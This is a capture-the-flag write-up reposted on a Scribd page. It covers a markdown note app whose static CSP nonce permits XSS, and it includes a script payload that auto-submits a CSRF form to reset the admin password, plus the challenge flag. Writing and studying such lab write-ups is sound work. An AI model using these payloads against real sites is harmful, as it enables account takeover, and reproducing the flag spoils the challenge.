Scribd Logo
Upload

Welcome to Scribd!

  • Malicious Markdown

    Uploaded by

    Antonio Carrion
    5 views3 pages
    This document describes an XSS and CSRF vulnerability in a markdown note sharing application. It explains that JavaScript is disabled in notes for security, but the content security policy uses a static nonce, allowing XSS. It also notes the password change form is vulnerable to CSRF. The solution uses an XSS payload to change the admin's password to a known value via a CSRF attack, then logs in as the admin to get the flag.

    Original Description:

    capture the flag chalenge, with link and solution

    Original Title

    malicious-markdown

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    This document describes an XSS and CSRF vulnerability in a markdown note sharing application. It explains that JavaScript is disabled in notes for security, but the content security policy uses a static nonce, allowing XSS. It also notes the password change form is vulnerable to CSRF. The solution uses an XSS payload to change the admin's password to a known value via a CSRF attack, then logs in as the admin to get the flag.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    5 views3 pages

    Malicious Markdown

    Uploaded by

    Antonio Carrion
    This document describes an XSS and CSRF vulnerability in a markdown note sharing application. It explains that JavaScript is disabled in notes for security, but the content security policy uses a static nonce, allowing XSS. It also notes the password change form is vulnerable to CSRF. The solution uses an XSS payload to change the admin's password to a known value via a CSRF attack, then logs in as the admin to get the flag.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 3

    Malicious

    2023-11-01
    Markdown 300 pts
    Description
    Use my markdown editor to share notes with each other. You can write most HTML but I disabled
    Javascript in notes because it's dangerous.
    Solution
    This challenge is an XSS/CSRF the admin type challenge with some other mitigiations.
    First through navigating the app we understand that we can create notes and also share them with other
    users. We also have the ability to create accounts and change our password.
    We have to make two observations to understand the steps of the exploit:
    The password change form is vulnerable to CSRF.
    The note viewer is vulnerable to XSS because the Content Security Policy rule in use is insecure due to
    the use of a static nonce.
    First we need to achieve XSS. This can be done by identifying the nonce that's in use by the CSP policy.
    This is set by the response header as follows:
    Content-Security-Policy: script-src 'nonce-2726c7f26c'

    Thus we can execute Javascript by giving our script tags the nonce of 2726c7f26c. For example:

    <script nonce="2726c7f26c">
    alert()
    </script>

    By creating a note with this payload we can see that we are able to run some JavaScript. If we share this
    note with the admin user, they should be hit with our payload.
    Copyright © 2023 CTFd LLC
    With XSS we can actually just finish the challenge by reading various parts of the site and then sending it to
    another server. However, there's an easier solution because we know that the password change form is
    vulnerable to CSRF.
    We can use our XSS payload to force the admin's browser to change their password to a password that we
    know with the following payload:

    <form method="POST" action="/profile" name="exploit">


    <input type="text" name="password" value="hacked">
    </form>
    <script nonce="2726c7f26c">
    document.forms.exploit.submit()
    </script>

    Note: You might need to use curl or fetch to manually share the note with the admin, as navigating to the
    note page to press the button will execute the payload and redirect you to profile.
    With this we now know the admin's password and username and we can login as them.

    Flags
    flag{look_at_me_im_the_admin_now}

    look_at_me_im_the_admin_now Copyright © 2023 CTFd LLC


    Copyright © 2023 CTFd LLC

    You might also like